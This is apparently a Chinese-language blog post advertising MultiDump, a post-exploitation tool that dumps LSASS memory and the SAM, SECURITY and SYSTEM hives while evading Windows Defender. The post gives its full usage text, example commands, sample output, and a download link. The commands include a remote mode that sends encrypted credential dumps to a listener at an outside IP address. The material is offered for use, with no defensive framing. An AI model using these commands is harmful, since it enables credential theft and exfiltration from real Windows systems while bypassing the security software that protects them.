绕过Defender转储和提取 LSASS

工具简介

MultiDump 是一个用 C 语言编写的后利用工具，用于谨慎地转储和提取 LSASS 内存，而不会触发 Defender 警报，并具有用 Python 编写的处理程序。
ProcDump.exeMultiDump 通过或来支持 LSASS 转储comsvc.dll，它提供两种模式：本地模式，在本地加密并存储转储文件；远程模式，将转储发送到处理程序进行解密和分析。


使用方法

    __  __       _ _   _ _____
   |  /  |_   _| | |_(_)  __ _   _ _ __ ___  _ __
   | |/| | | | | | __| | |  | | | | | '_ ` _ | '_
   | |  | | |_| | | |_| | |__| | |_| | | | | | | |_) |
   |_|  |_|__,_|_|__|_|_____/ __,_|_| |_| |_| .__/
                                               |_|

Usage:  MultiDump.exe [-p <ProcDumpPath>] [-l <LocalDumpPath> | -r <RemoteHandlerAddr>] [--procdump] [-v]

-p              Path to save procdump.exe, use full path. Default to temp directory
-l              Path to save encrypted dump file, use full path. Default to current directory
-r              Set ip:port to connect to a remote handler
--procdump      Writes procdump to disk and use it to dump LSASS
--nodump        Disable LSASS dumping
--reg           Dump SAM, SECURITY and SYSTEM hives
--delay         Increase interval between connections to for slower network speeds
-v              Enable verbose mode

MultiDump defaults in local mode using comsvcs.dll and saves the encrypted dump in the current directory.
Examples:
        MultiDump.exe -l C:UsersPubliclsass.dmp -v
        
        MultiDump.exe --procdump -p C:Toolsprocdump.exe -r 192.168.1.100:5000
        usage: MultiDumpHandler.py [-h] [-r REMOTE] [-l LOCAL] [--sam SAM] [--security SECURITY] [--system SYSTEM] [-k KEY] [--override-ip OVERRIDE_IP]

Handler for RemoteProcDump

options:
  -h, --help            show this help message and exit
  -r REMOTE, --remote REMOTE
                        Port to receive remote dump file
  -l LOCAL, --local LOCAL
                        Local dump file, key needed to decrypt
  --sam SAM             Local SAM save, key needed to decrypt
  --security SECURITY   Local SECURITY save, key needed to decrypt
  --system SYSTEM       Local SYSTEM save, key needed to decrypt
  -k KEY, --key KEY     Key to decrypt local file
  --override-ip OVERRIDE_IP
                        Manually specify the IP address for key generation in remote mode, for proxied connection

与所有 LSASS 相关工具一样，需要 Administrator/SeDebugPrivilege 权限。
该处理程序依赖Pypykatz来解析 LSASS 转储，并依赖impacket来解析注册表保存。它们应该安装在您的环境中。如果您看到该错误All detection methods failed，则 Pypykatz 版本可能已过时。
默认情况下，MultiDump 使用该Comsvc.dll方法并将加密转储保存在当前目录中。

MultiDump.exe
...
[i] Local Mode Selected. Writing Encrypted Dump File to Disk...
[i] C:UsersMalTestDesktopdciqjp.dat Written to Disk.
[i] Key: 91ea54633cd31cc23eb3089928e9cd5af396d35ee8f738d8bdf2180801ee0cb1bae8f0cc4cc3ea7e9ce0a74876efe87e2c053efa80ee1111c4c4e7c640c0e33e
./ProcDumpHandler.py -f dciqjp.dat -k 91ea54633cd31cc23eb3089928e9cd5af396d35ee8f738d8bdf2180801ee0cb1bae8f0cc4cc3ea7e9ce0a74876efe87e2c053efa80ee1111c4c4e7c640c0e33e


如果--procdump使用，ProcDump.exe将写入磁盘以转储 LSASS。

在远程模式下，MultiDump 连接到处理程序的侦听器。
./ProcDumpHandler.py -r 9001
[i] Listening on port 9001 for encrypted key...
MultiDump.exe -r 10.0.0.1:9001
密钥使用处理程序的 IP 和端口进行加密。当 MultiDump 通过代理连接时，处理程序应使用该--override-ip选项手动指定用于远程模式下密钥生成的 IP 地址，通过将解密 IP 与 MultiDump 中设置的预期 IP 进行匹配来确保解密正确进行-r。
转储 的附加选项SAM，SECURITY并且SYSTEM配置单元可用于--reg，解密过程与 LSASS 转储相同。这更像是一个方便的功能，可以使漏洞利用后的信息收集变得更加容易。

下载链接
https://pan.quark.cn/s/75aea49dcf09